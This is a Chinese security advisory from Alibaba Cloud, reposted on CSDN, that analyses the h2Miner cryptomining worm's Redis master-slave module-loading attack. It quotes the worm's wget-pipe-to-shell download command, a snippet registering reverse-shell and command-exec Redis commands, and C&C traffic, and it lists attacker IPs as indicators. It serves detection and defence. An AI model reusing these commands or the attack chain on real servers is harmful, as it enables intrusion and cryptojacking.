威胁快报|Redis RCE导致h2Miner蠕虫新一轮爆发，建议用户及时排查以防事态升级_阿里云技术的博客-CSDN博客
威胁快报|Redis RCE导致h2Miner蠕虫新一轮爆发，建议用户及时排查以防事态升级
阿里云技术
于 2020-01-06 16:31:32 发布
2865
收藏
文章标签：
安全
服务器
h2Miner蠕虫
版权声明：本文为博主原创文章，遵循 CC 4.0 BY-SA 版权协议，转载请附上原文出处链接和本声明。
本文链接：https://blog.csdn.net/weixin_43970890/article/details/103857487
版权
概述
近日，阿里云安全团队监测到h2Miner挖矿僵尸网络蠕虫的一波突然爆发，其利用Redis未授权或弱口令作为入口，使用主从同步的方式从恶意服务器上同步恶意module，之后在目标机器上加载此恶意module并执行恶意指令。
在以往常见的攻击者或蠕虫中，其大多都沿用登陆redis后写入定时任务或写ssh key的方式进行入侵，这种方式受权限与系统类型影响并不一定能够成功。而此次使用redis加载module的攻击方式，可以直接执行任意指令或拿到shell交互环境，危害极大。
由于全网redis近百万台的数量，因此阿里云安全团队建议用户尽量不要将redis服务暴露在公网，及时排查相关弱口令问题及是否受蠕虫影响，必要时可考虑选用安全产品帮助保障安全。
背景
h2Miner团伙
h2Miner是一个linux下的挖矿僵尸网络，通过hadoop yarn未授权、docker未授权、confluence RCE、thinkphp5RCE、Redis未授权等多种手段进行入侵，下载恶意脚本及恶意程序进行挖矿牟利，横向扫描扩大攻击面并维持C&C通信。
Redis RCE
此利用方式由Pavel Toporkov在zeronights 2018上分享，在Redis 4.x之后，Redis新增了Module功能，使用者可以在Redis中加载由C语言编译而成的so文件，从而实现特定的Redis命令。而在Redis主从模式下，可以通过FULLRESYNC同步文件到从机上，从而完成恶意so文件的传输。传输完成后在目标机Redis上进行Module加载，便可执行任意指令。
蠕虫分析
近日，阿里云安全团队发现h2Miner团伙规模突然急剧上升，在短短几日所影响的主机数量翻了一个数量级，阿里云安全团队在第一时间进行了响应。根据分析，整体的攻击链路如下图：
攻击链路
h2miner主要使用Redis RCE的方式来完成入侵，首先利用Redis未授权或弱口令获取Redis登录权限，之后利用使用config set dbfilename red2.so来修改保存文件名，之后使用salveof命令设置主从复制的主机地址。当目标Redis服务与攻击者所有的恶意Redis服务建立主从连接关系后，攻击者控制恶意Redis发送FULLRESYNC进行文件同步，同步的结果会在目标Redis上写入red2.so文件，从而完成了恶意so文件的传输。在此之后，攻击者利用module load ./red2.so加载此so文件，此模块根据传入的参数可以执行任意指令或发起反向连接获取shell环境。
if (RedisModule_CreateCommand(ctx, "system.exec",
DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "system.rev",
RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
在执行类似/bin/sh -c wget -q -O - http://195.3.146.118/unk.sh | sh > /dev/null 2>&1的恶意指令之后，攻击者会将的文件名恢复为默认的，并使用module unload卸载system模块的加载，从而清理相应的痕迹。但依旧在被攻击主机上残留有red2.so文件，建议用户关注自身Redis服务目录下是否有此可疑文件。
跟进其使用的恶意脚本，除了杀死一些恶意进程以抢夺资源之外，会向http://142.44.191.122/kinsing下载恶意二进制文件并运行，因此主机中包含kinsing的进程或目录可能代表此机器已被该蠕虫"光临"。 根据简单的逆向分析结果显示，该恶意程序主要有以下功能：
下载文件并执行执行挖矿程序维持C&C通信并执行命令利用masscan对外扫描以扩大影响面
恶意程序函数列表
除此之外，恶意程序中内置了C&C服务器ip地址，受影响的主机会以http的方式与C&C通信服务器进行通信，其中肉鸡的信息在http头部中标识。
内置C&C服务器
GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip
其他攻击方式
序号攻击方式1Solr dataimport RCE(CVE-2019-0193)2Hadoop Yarn REST API 未授权RCE (CVE-2017-15718)3Docker Remote API未授权RCE4ThinkPHP5 全局变量覆盖RCE5Confluence 未授权RCE (CVE-2019-3396)
IOC
/kinsing
142.44.191.122/t.sh  185.92.74.42/h.sh  142.44.191.122/spr.sh  142.44.191.122/spre.sh  195.3.146.118/unk.sh
c&c  45.10.88.102  91.215.169.111  139.99.50.255  46.243.253.167  195.123.220.193
安全建议
Redis 非必要情况不要暴露在公网，使用足够强壮的Redis口令；排查Redis路径下是否残留red2.so文件，查询主机上是有否包含有kinsing的文件或进程，以确认是否被此蠕虫感染；建议使用阿里云安全的下一代云防火墙产品，其阻断恶意外联、能够配置智能策略的功能，能够有效帮助防御入侵。哪怕攻击者在主机上的隐藏手段再高明，下载、挖矿、反弹shell这些操作，都需要进行恶意外联；云防火墙的拦截将彻底阻断攻击链。此外，用户还可以通过自定义策略，直接屏蔽恶意网站，达到阻断入侵的目的。此外，云防火墙独有的虚拟补丁功能，能够帮助客户更灵活、更“无感”地阻断攻击；对于有更高定制化要求的用户，可以考虑使用阿里云安全管家服务。购买服务后将有经验丰富的安全专家提供咨询服务，定制适合您的方案，帮助加固系统，预防入侵。入侵事件发生后，也可介入直接协助入侵后的清理、事件溯源等，适合有较高安全需求的用户，或未雇佣安全工程师，但希望保障系统安全的企业。
原文链接 本文为阿里云原创内容，未经允许不得转载。
阿里云技术
关注
关注
点赞
收藏
打赏
评论
威胁快报|Redis RCE导致h2Miner蠕虫新一轮爆发，建议用户及时排查以防事态升级
概述近日，阿里云安全团队监测到h2Miner挖矿僵尸网络蠕虫的一波突然爆发，其利用Redis未授权或弱口令作为入口，使用主从同步的方式从恶意服务器上同步恶意module，之后在目标机器上加载此恶意module并执行恶意指令。在以往常见的攻击者或蠕虫中，其大多都沿用登陆redis后写入定时任务或写ssh key的方式进行入侵，这种方式受权限与系统类型影响并不一定能够成功。而此次使用redis...
复制链接
扫一扫
谷歌浏览器稳定版_78.0.3904.108_x64.exe
12-24
谷歌浏览器稳定版78，谷歌浏览器有各种各样的版本，但是作为一个测试还是需要保留某些版本作为兼容性测试，因为客户的浏览器是各种各样的，不能忽略主流浏览器的近期版本
参与评论
您还未登录，请先
登录
后发表或查看评论
<python>简单的爬虫入门，一些爬取示例
Red_Lotus_的博客
11-07
132
百度360搜索关键词提交
搜索引擎关键词接口：
百度：“http://www.baidu.com/s?wd=keyword”
360：“http://www.so.com/s?q=keyword”
用params来获得搜索词
示例代码：
import requests
kv={'wd':'python'}#记得两个都要单引号
r=requests.get("http://www.baidu.com...
红色代码病毒分析
蝈蝈俊.net
08-07
3792
CODE RED 利用 IIS WEB 服务器 .IDA 缓冲区溢出漏洞传播。 如果它感染了一个主机，将会在受影响机器上作如下活动：1、建立起初始蠕虫环境2、建立起100个蠕虫线程3、前99个线程会传播感染其它主机4、第100个线程会检查自身是否运行于一个英文版本的 Windows NT/2000如果是，它将会替换该主机页面Welcome to http://www.worm.com !, Hac
Redis进行RCE利用总结
最新发布
weixin_50464560的博客
11-07
273
百度百科：Redis（Remote Dictionary Server )，即远程字典服务，是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库，并提供多种语言的API。连接到redis，输入以下指令利用crontab反弹shell。Redis因配置不当可导致攻击者直接获取到服务器的权限。倘若服务器运行着LAMP/LNMP服务，且已知工作目录为。kali中打开一个新的命令行窗口执行。
Selenium(一)---Selenium的安装和使用
FHHHC的博客
12-01
567
一、前言
　　最近在帮一个老师爬取网页内容，发现网页是动态加载的，为了拿到全部的网页数据，这里使用到了Selenium。Selenium 是一个用于Web应用程序测试的工具，它可以模拟真实浏览器，支持多种浏览器，而且是直接运行在浏览器中，就像真正的用户在操作一样。
　　环境：win10 64位 + python3.6 + chrome78.0.3904.108 64位
二、安装
注：以下安装配...
谷歌浏览器正式版90_谷歌浏览器 Chrome v78.0.3904.108 正式版发布（附下载地址）...
weixin_39884323的博客
11-05
1978
谷歌浏览器 Chrome v78.0.3904.108 正式版带来了多项功能和改进，在 Windows 10(版本 1511+)系统上默认启用。同时，还引入了内置的密码检查工具，目的是如果在用户登录期间发现异常就会发出提醒，允许用户在新标签页中添加壁纸，以及安装来自于 Chrome Web Store 上的主题。Google Chrome 官方本地下载地址：Chrome 78.0.3904.108...
记一次Redis被入侵，生成red2.so文件的问题
Csea的博客
06-03
2472
晚上收到一条短信，之前给人家服务器部署的时候，redis我直接暴露了，结果就被入侵了，后来网上查到阿里云在今年的一月份发现了这个危险，是有一个h2Miner团伙来入侵服务器，留下red2.so文件，还有kinsing蠕虫。
最后参考阿里云的文字，排查red2.so文件和kinsing文件和进程，在我服务器里就找到red2.so文件和kinsingQQUKL1HbtE文件，就他删了。也把redis的配置改回不允许远程关闭了redis的端口。
具体可以参考阿里云的文章
...
爬虫基础-xpath解析样例
wangshui898的专栏
08-14
233
爬取58二手房title
# -*- coding:utf-8 -*-
import requests
from lxml import etree
if __name__ == "__main__":
# 获取页面数据
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Sa
Redis的RCE漏洞
midi
02-13
1450
前言
做ssrf时碰到个redis的主从复制（[网鼎杯 2020 玄武组]SSRFMe）
writeup
<?php
if($_SERVER['REMOTE_ADDR']==="127.0.0.1"){
highlight_file(__FILE__);
if(isset($_POST['file'])){
file_put_contents($_POST['file'],"<?php echo 'redispass is root';exit();".$_POST['file'])
Redis基于主从复制的RCE
m0_58596609的博客
10-13
1165
Redis基于主从复制的RCE
服务器被挖矿程，处理过程
tooadmin的博客
12-25
1778
服务器被挖矿程，处理过程
出现kdevtmpfsi进程
1、top 命令查看所有的进程，发现CPU使用率最高进程 kdevtmpfsi kill 之后自动又被启动
2、crontab -e 查看定时任务发现出现了如下莫名的定时任务，做了删除处理
#* * * * * wget -q -O - http://195.3.146.118/unk.sh | sh > /dev/null 2>...
Redis 基于主从复制的 RCE 利用方式
systemino的博客
07-14
3681
作者：LoRexxar’@知道创宇404实验室
在2019年7月7日结束的WCTF2019 Final上，LC/BC的成员Pavel Toporkov在分享会上介绍了一种关于redis新版本的RCE利用方式，比起以前的利用方式来说，这种利用方式更为通用，危害也更大，下面就让我们从以前的redis RCE利用方式出发，一起聊聊关于redis的利用问题。PHP大马
https://201...
利用Redis漏洞远程向服务器写入定时任务
kouryoushine的博客
02-25
4478
由于近期阿里云服务器报警redis漏洞，经过调查对黑客的入侵过程进行了整理并模拟一遍,庆幸此次黑客行为未对公司造成影响，同时还让我学习了很多知识，这里分享给大家。
1，被入侵的前提条件
redis没有设置密码 。
redis配置文件没有打开保护模式，并且没有bindIP地址 。
安全组设置打开了redis的6379端口。
以root用户启动redis。
有人可能会问，怎么可能这么傻，连个密码都不...
Redis RCE 反弹shell 漏洞复现
06-07
610
1 Redis简介
Redis是一个开源的使用ANSI C语言编写、支持网络、科技与内存也可以持久化的日志型、Key-Value数据库，并提供多种语言的API
环境搭建
生成so文件几个错误
red_ear的博客
12-26
234
2019-12-26 17:17:57.722 31818-31818/com.example.loadso E/AndroidRuntime: FATAL EXCEPTION: main
Process: com.example.loadso, PID: 31818
java.lang.UnsatisfiedLinkError: dalvik.system.PathClassL...
Chrome 64位 78.0.3904.70版本 安装包
11-15
Chrome 64位 版本号：78.0.3904.70 发布日期：2019-10-23
适用于 Windows 10/8/7/XP 64位
Win10下搭建Python3.7.1 selenium3 Chrome开发环境
DevOps海洋的渔夫@专栏
12-03
362
环境版本说明
Python 3.7.1
Selenium 3
Chrome 版本 78.0.3904.108（正式版本） （64 位）
使用pip3安装selenium
pip3 install selenium
当前安装的最新版本：selenium-3.141.0
下载webdriver驱动
selenium如果想要执行chrome浏览器的话，是需要安装驱动chromedr...
redis主从rce和redis5.0版本下rce的不同
五分之一世纪
08-08
383
文章目录（1）redis遵循的两种脚本协议【1】明文（plaintext）【2】序列化（custom）【3】分析（2）实现rce的方法【1】不持久的RCE【2】一般情况下的持久的RCE【3】5.0版本下持久的RCE
学习redis主从漏洞你一定要知道的知识点
（1）redis遵循的两种脚本协议
【1】明文（plaintext）
example: SET keyname value\n
【2】序列化（custom）
example: *3\r\n$3\r\nSET\r\n$7\r\nkeyname\r\n$5
Redis未授权访问利用RCE进行漏洞复现
三天不打上房揭瓦的博客
12-22
802
前言：小编也是现学现卖，方便自己记忆，写的不好的地方多多包涵，希望各位大佬多多批评指正。
目录漏洞概述影响版本环境搭建和漏洞复现1.环境启动2.下载使用RCE漏洞防御
漏洞概述
Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库，并提供多种语言的API。
Redis在默认情况下，会绑定6379这个端口，如果服务器没有采用限制IP访问或在防火墙做策略，就会将Redis服务暴露在公网上，并且在没有设置密码认证的情况下（既然有密码也可进行爆破），会导
“相关推荐”对你有帮助么？
非常没帮助
没帮助
一般
有帮助
非常有帮助
提交
©️2022 CSDN
皮肤主题：精致技术
设计师：CSDN官方博客
返回首页
阿里云技术
CSDN认证博客专家
CSDN认证企业博客
码龄4年
暂无认证
3439
原创
4789
周排名
141
总排名
144万+
访问
等级
4万+
积分
2300
粉丝
519
获赞
265
评论
2909
收藏
私信
关注
热门文章
什么是低代码（Low-Code）？
52992
一文快速了解MaxCompute
17982
10分钟部署一个别人可以访问的在线网站
15284
Quick BI功能篇之（一）：20分钟入门
13783
性能压测中的SLA，你知道吗？
11999
最新评论
RTOS成功取代Linux成为天猫精灵OS的关键 -- AliOS Things 维测专题
晴天_QQ:
请问，debug_watch_on函数在那个文件里面？谢谢
一招解决开发环境问题——远程容器开发指南
客服257:
对于优质文章，也许我的评论会迟到，但不会缺席。文章很赞，必须点赞!
1-5-10 快恢在数字化安全生产平台 DPS 中的设计与落地
Passerby_Wang:
写得也太详细了吧，学到了好多 也欢迎博主来我这里指点一二呀
基于 OpenYurt 和 EdgeX 的云边端协同新可能
mpb:
有没有个入门链接啊，怎么安装openyurt+edgex，有没有demo啊，类似kubeedge的count demo之类的
MaxCompute SQL与Hive对比分析及使用注意事项
zhuanke:
原文连接都没有，图片看不清
您愿意向朋友推荐“博客详情页”吗？
强烈不推荐
不推荐
一般般
推荐
强烈推荐
提交
最新文章
如何通过链路追踪进行定时任务诊
当云原生成为一种显学，对象存储和数据湖如何顺势而为
阿里灵杰：与开发者一起推动AI创新落地
2022
12月
37篇
11月
64篇
10月
12篇
09月
95篇
08月
86篇
07月
89篇
06月
81篇
05月
89篇
04月
93篇
03月
104篇
02月
74篇
01月
80篇
2021年988篇
2020年936篇
2019年1099篇
2018年68篇
目录
目录
最新文章
如何通过链路追踪进行定时任务诊
当云原生成为一种显学，对象存储和数据湖如何顺势而为
阿里灵杰：与开发者一起推动AI创新落地
2022
12月
37篇
11月
64篇
10月
12篇
09月
95篇
08月
86篇
07月
89篇
06月
81篇
05月
89篇
04月
93篇
03月
104篇
02月
74篇
01月
80篇
2021年988篇
2020年936篇
2019年1099篇
2018年68篇
目录
评论
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
查看更多评论
打赏作者
阿里云技术
你的鼓励将是我创作的最大动力
¥2
¥4
¥6
¥10
¥20
输入1-500的整数
余额支付
(余额：-- )
扫码支付
扫码支付：¥2
获取中
扫码支付
您的余额不足，请更换扫码支付或充值
打赏作者
实付元
使用余额支付
点击重新获取
扫码支付
钱包余额
抵扣说明：
1.余额是钱包充值的虚拟货币，按照1:1的比例进行支付金额的抵扣。 2.余额无法直接购买下载，可以购买VIP、C币套餐、付费专栏及课程。
余额充值